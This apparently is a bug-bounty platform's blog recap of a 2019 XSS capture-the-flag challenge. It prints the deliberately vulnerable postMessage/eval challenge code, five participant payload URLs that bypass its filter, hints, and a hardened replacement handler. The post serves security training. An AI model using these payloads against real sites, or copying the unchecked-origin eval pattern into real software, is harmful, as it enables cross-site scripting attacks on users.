By Intigriti
May 6, 2019
CHALLENGE: Can you find the XSS? Earn a Burp License, cool swag & private invites! https://t.co/EehqBfFmjA pic.twitter.com/sq8FIYgQOH
– Intigriti (@intigriti) April 29, 2019
A couple of days ago we released an XSS challenge. A few hours after sending out the tweet, we noticed how popular it had become, so we decided to share a blog post with the lovely community.
For those who still want to try, the challenge is still up! => https://challenge.intigriti.io <=
In case it's not available anymore or you want to host the challenge yourself, you can find the code below.
// Take the URL from the fragment, decode it once, normalise it through the URL parser,
// and rewrite every occurrence of "script" and of "<" (case-insensitive) to "forbidden"
const url = new URL(decodeURIComponent(document.location.hash.substr(1))).href.replace(/script|</gi, "forbidden");

// Load the user-supplied URL in an iframe
const iframe = document.createElement("iframe");
iframe.src = url;
document.body.appendChild(iframe);

// Once the frame has loaded, start listening for postMessage events
iframe.onload = function () {
  window.addEventListener("message", executeCtx, false);
};

function executeCtx(e) {
  // Only the source window is compared; e.origin is never checked
  if (e.source == iframe.contentWindow) {
    e.data.location = window.location;
    // Every key of the message becomes a global on the top-level window
    Object.assign(window, e.data);
    // The filtered URL string is evaluated as JavaScript on challenge.intigriti.io
    eval(url);
  }
}
We could write an in-depth explanation of how to solve this challenge, but we couldn't do a better job than Dominic and dPhoeniixx. Both researchers shared a well-written and very detailed blog post. You can find the link below.
The @intigriti XSS Challenge is over! Here's a writeup I did explaining my solution and how I got there! https://t.co/075tIcIb39 ... Thanks for the super fun challenge! pic.twitter.com/OnpTM35tne
– Dominic (@dee__see) May 3, 2019
Wondering how this challenge could be solved in a different way? Take a look at the payloads shared below.
https://challenge.intigriti.io/#data:text/html;var%20text=text;var%20html=html;alert(xss)//;base64,PGh0bWw+PGJvZHkgb25sb2FkPXhzcygpPjxzY3JpcHQ+IGZ1bmN0aW9uIHhzcygpIHsgcGFyZW50LnBvc3RNZXNzYWdlKHsneHNzJzogIm4wdG0zIn0sICcqJyk7IH07IDwvc2NyaXB0Pg==
by n0tm3
https://challenge.intigriti.io/#data:text/html,alert()//%253Csvg/onload=%27top.postMessage(%7B%22text%22:%201%7D,%20%22*%22);top.postMessage(%7B%22html%22:%201%7D,%20%22*%22)%27%253E
by Karel_Origin
https://challenge.intigriti.io/#data:text/html;var%20text=alert%28%29;var%20html;base64,YWE8c3ZnL29ubG9hZD0idG9wLnBvc3RNZXNzYWdlKDAsJyonKSI+11
by terjanq
https://challenge.intigriti.io/#data:text/html,alert(document.domain);//%253csvg%20onload=%22parent.postMessage({text:4,html:1},'*');%22%253e
by daudmalik06
https://challenge.intigriti.io/#data:text/html,alert(document.domain)//%253C%2553cript%253Ewindow.parent.postMessage({text:%22%22,html:%22%22}%2C%20%22*%22)%253C%2F%2553cript%253E
by _zulln
One of the most common mistakes we saw was people triggering the alert box inside the iframe. That is not a valid solution, because the JavaScript doesn't run in the context of challenge.intigriti.io but inside the iframe itself, whose origin is null.
The four tips shared during the challenge:
First tip: "It's all about that base, 'bout that base."
Second tip: "Define the undefined."
Third tip: "You don't need any external resources."
Fourth tip: "Look for the charset."
Instead of blindly using a wordlist of payloads, understand what you are doing. Go through the challenge step by step and make use of the debugger built into your browser.
Do not trust user input. Input validation is key!
Seeing a message event? Make sure you check the origin!
Avoid using eval().
Do not give up. Patience is key.
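A hardened replacement for the challenge's executeCtx() that applies the lessons above, added here as an example (it is not the challenge's own code); the origin allowlist and the text/html key schema are assumptions, and the function is kept pure so it also runs outside a browser:

```javascript
// Assumed allowlist of origins that are permitted to talk to this page.
const ALLOWED_ORIGINS = new Set(["https://challenge.intigriti.io"]);

// Assumed schema: only these keys, with these types, are accepted.
const SCHEMA = { text: "string", html: "string" };

// Returns a sanitized copy of event.data, or null when the message is rejected.
// Nothing is ever eval()'d and nothing is merged into window.
function validateMessage(event, allowedOrigins = ALLOWED_ORIGINS) {
  // 1. Origin check. A data: URL iframe reports the string "null" here, so a
  //    frame like the one the challenge loads is rejected outright.
  if (typeof event.origin !== "string" || !allowedOrigins.has(event.origin)) {
    return null;
  }
  // 2. Structural check: the payload must be a plain object, not a string or array.
  const data = event.data;
  if (data === null || typeof data !== "object" || Array.isArray(data)) {
    return null;
  }
  // 3. Allowlist keys and types. Unknown keys (e.g. "xss" or "location") are
  //    dropped instead of becoming globals as Object.assign(window, e.data) did.
  const clean = Object.create(null);
  for (const [key, expected] of Object.entries(SCHEMA)) {
    if (!Object.prototype.hasOwnProperty.call(data, key)) continue;
    if (typeof data[key] !== expected) return null;
    clean[key] = data[key];
  }
  return clean;
}

// Browser wiring, guarded so the file also loads under Node for testing.
if (typeof window !== "undefined") {
  window.addEventListener("message", (e) => {
    const msg = validateMessage(e);
    if (msg === null) return; // ignore (or log) anything that fails validation
    // Render msg.text / msg.html through safe DOM APIs such as textContent;
    // never eval() a string derived from the URL or the message.
  }, false);
}
```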
A special thanks to @filedescriptor and @edoverflow for hardening our challenge!
Thanks to the community for participating in the challenge and congratulations to the 90 researchers who solved the challenge. A shout-out to the winner fenrir, who won a Burp License, swag package and private invites on our platform.
The XSS Challenge is over! Thank you all for participating. We had a whopping 90 valid submissions but there can only be one winner. Check the video below to discover who's getting a Burp Pro License and an exclusive @intigriti swag package! #HackWithIntigriti #CTF #BugBounty pic.twitter.com/l2tNzYwJGB
– Intigriti (@intigriti) May 3, 2019
Follow us on Twitter and don't forget to subscribe to our weekly Bug Bytes, a newsletter curated by Pentester Land and powered by intigriti, containing more write-ups and helpful resources.